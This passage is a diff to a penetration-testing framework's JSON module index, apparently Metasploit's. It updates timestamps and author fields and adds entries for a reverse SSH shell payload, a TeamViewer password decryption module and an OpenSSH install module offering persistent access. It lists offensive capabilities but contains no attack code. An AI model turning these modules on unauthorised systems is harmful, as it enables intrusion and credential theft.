    ],
    "description": "Creates an interactive shell via php, uses SSL",
    "references": [
@@ -145249,7 +146039,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-19 15:49:46 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_php_ssl",
@@ -145282,7 +146072,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -145303,7 +146093,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
    "references": [
@@ -145315,7 +146105,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -145336,7 +146126,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via R",
    "references": [
@@ -145348,7 +146138,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_r",
@@ -145381,7 +146171,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby",
@@ -145402,7 +146192,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via Ruby, uses SSL",
    "references": [
@@ -145414,7 +146204,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -145447,7 +146237,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_socat_udp",
@@ -145458,6 +146248,40 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/reverse_ssh": {
+    "name": "Unix Command Shell, Reverse TCP SSH",
+    "fullname": "payload/cmd/unix/reverse_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "RageLtMan <rageltman@sempervictus>",
+      "hirura"
+    ],
+    "description": "Connect back and create a command shell via SSH",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-18 15:21:46 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/reverse_ssl_double_telnet": {
    "name": "Unix Command Shell, Double Reverse TCP SSL (telnet)",
    "fullname": "payload/cmd/unix/reverse_ssl_double_telnet",
@@ -145469,7 +146293,7 @@
    "type": "payload",
    "author": [
      "hdm <x@hdm.io>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option",
    "references": [
@@ -145481,7 +146305,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -145987,7 +146811,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-23 19:23:02 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_powershell",
@@ -146662,7 +147486,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -146697,7 +147521,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -146732,7 +147556,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -146833,7 +147657,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -146868,7 +147692,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -146903,7 +147727,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -147106,7 +147930,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -147141,7 +147965,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -147176,7 +148000,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -147345,7 +148169,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -147380,7 +148204,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -147415,7 +148239,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -147519,7 +148343,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -147554,7 +148378,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -147589,7 +148413,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -147831,7 +148655,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -147866,7 +148690,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -147901,7 +148725,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -148074,7 +148898,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -148109,7 +148933,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -148144,7 +148968,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -148377,7 +149201,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -148412,7 +149236,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -148447,7 +149271,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -148482,7 +149306,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -148517,7 +149341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -148552,7 +149376,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -148689,7 +149513,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -148724,7 +149548,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -148759,7 +149583,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -149576,7 +150400,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -149611,7 +150435,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -149646,7 +150470,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -150357,7 +151181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -150392,7 +151216,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -150427,7 +151251,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -151267,7 +152091,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -151302,7 +152126,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -151337,7 +152161,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-31 09:32:44 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -152922,7 +153746,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
    "references": [
@@ -152934,7 +153758,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "python/shell_reverse_tcp_ssl",
@@ -152988,7 +153812,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Continually listen for a connection and spawn a command shell via R",
    "references": [
@@ -153000,7 +153824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/r/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "r/shell_bind_tcp",
@@ -153021,7 +153845,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via R",
    "references": [
@@ -153033,7 +153857,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "r/shell_reverse_tcp",
@@ -153222,7 +154046,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Connect back and create a command shell via Ruby, uses SSL",
    "references": [
@@ -153234,7 +154058,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "ruby/shell_reverse_tcp_ssl",
@@ -157270,7 +158094,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-02 15:47:36 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/pingback_reverse_tcp",
@@ -163123,7 +163947,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-15 14:35:38 +0000",
    "path": "/modules/post/linux/gather/enum_system.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_system",
@@ -166201,7 +167025,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-04-24 05:06:20 +0000",
+    "mod_time": "2020-02-13 16:17:33 +0000",
    "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/password_prompt_spoof",
@@ -168389,6 +169213,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/teamviewer_passwords": {
+    "name": "Windows Gather TeamViewer Passwords",
+    "fullname": "post/windows/gather/credentials/teamviewer_passwords",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nic Losby <blurbdust@gmail.com>"
+    ],
+    "description": "This module will find and decrypt stored TeamViewer passwords",
+    "references": [
+      "CVE-2019-18988",
+      "URL-https://whynotsecurity.com/blog/teamviewer/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-07 10:07:41 +0000",
+    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/teamviewer_passwords",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/tortoisesvn": {
    "name": "Windows Gather TortoiseSVN Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/tortoisesvn",
@@ -169639,7 +170497,7 @@
      "zeroSteiner <zeroSteiner@gmail.com>",
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering",
+    "description": "This module will attempt to enumerate which patches are applied to a windows system\n          based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/aa394391(v=vs.85).aspx"
    ],
@@ -169649,7 +170507,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-12-14 15:58:45 +0000",
+    "mod_time": "2020-01-14 20:49:39 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -170944,7 +171802,7 @@
    ],
    "description": "This module modifies a remote .docx file that will, upon opening, submit\n        stored netNTLM credentials to a remote host. Verified to work with Microsoft\n        Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n        auxiliary/server/capture/smb module can be used.",
    "references": [
-      "URL-http://jedicorp.com/?p=534"
+      "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
    ],
    "platform": "Windows",
    "arch": "",
@@ -170952,7 +171810,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-24 18:17:06 +0000",
    "path": "/modules/post/windows/gather/word_unc_injector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/word_unc_injector",
@@ -171138,7 +171996,7 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will download a file by importing urlmon via railgun.\n        The user may also choose to execute the file with arguments via exec_string.",
    "references": [
@@ -171150,7 +172008,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/download_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/download_exec",
@@ -171271,7 +172129,7 @@
    "type": "post",
    "author": [
      "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will execute a powershell script in a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
    "references": [
@@ -171283,7 +172141,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/exec_powershell",
@@ -171461,6 +172319,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/install_ssh": {
+    "name": "Install OpenSSH for Windows",
+    "fullname": "post/windows/manage/install_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "references": [
+      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
+      "URL-https://github.com/PowerShell/openssh-portable"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-01-19 19:51:44 +0000",
+    "path": "/modules/post/windows/manage/install_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/killav": {
    "name": "Windows Post Kill Antivirus and Hips",
    "fullname": "post/windows/manage/killav",
@@ -171774,7 +172666,7 @@
    "type": "post",
    "author": [
      "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module will download and execute a PowerShell script over a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
    "references": [
@@ -171786,7 +172678,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -171941,9 +172833,10 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
+      "b4rtik"
    ],
-    "description": "This module will inject into the memory of a process a specified Reflective DLL.",
+    "description": "This module will inject a specified reflective DLL into the memory of a\n        process, new or existing. If arguments are specified, they are passed to\n        the DllMain entry point as the lpvReserved (3rd) parameter. To read\n        output from the injected process, set PID to zero and WAIT to non-zero.\n        Make sure the architecture of the DLL matches the target process.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection"
    ],
@@ -171953,7 +172846,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
